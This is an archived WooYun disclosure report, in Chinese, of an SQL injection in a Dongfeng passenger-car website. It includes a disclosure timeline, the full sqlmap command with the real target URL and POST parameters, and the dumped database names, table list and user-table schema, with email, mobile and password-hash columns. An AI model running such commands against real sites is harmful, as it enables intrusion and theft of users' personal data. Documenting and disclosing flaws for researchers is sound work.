乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
那么多东风的站。。。我都看晕了
sqlmap.py -u "http://www.dfpv.com.cn/fs/pressroom_retrieve/1444378873.html" --data "email=safe3q%40gmail.com&realname=88952634" --dbs
脱出数据证明问题
available databases [10]:[*] activityax7[*] ax7game[*] dealerdfyl[*] information_schema[*] jac_weixin[*] mysql[*] qrvote[*] shen[*] shen_a30[*] shen_langsongDatabase: dealerdfyl[33 tables]+-----------------+| tAbout || tActivity || tAgency || tBoard || tCar || tCarAgency || tContact || tDna || tHistory || tHonor || tJob || tJoin || tMaterial || tModel || tModelAgency || tModelMaterial || tModelSale || tPictures || tPromotion || tService || tSession || tStaff || tTypes || tUser || tUserAgency || tUserEmail || tUserLast || tUserMobile || tVisual || tVisualBAK || tVisualSpots || tVisualSpotsBAK || tagency |+-----------------+Database: dealerdfylTable: tUser[14 columns]+----------+-----------------------+| Column | Type |+----------+-----------------------+| agency | int(11) unsigned || avator | varchar(255) || city | int(4) unsigned || email | varchar(63) || gender | enum('male','female') || id | int(10) unsigned || mobile | varchar(31) || name | varchar(31) || nick | varchar(16) || parent | int(11) unsigned || pwd | char(32) || role | tinyint(1) unsigned || status | tinyint(1) unsigned || updateAt | int(10) unsigned |+----------+-----------------------+
综上
你们懂
危害等级:高
漏洞Rank:15
确认时间:2015-10-12 08:56
漏洞不是我司负责范围,请乌云联系《东风乘用车公司》。@疯狗
暂无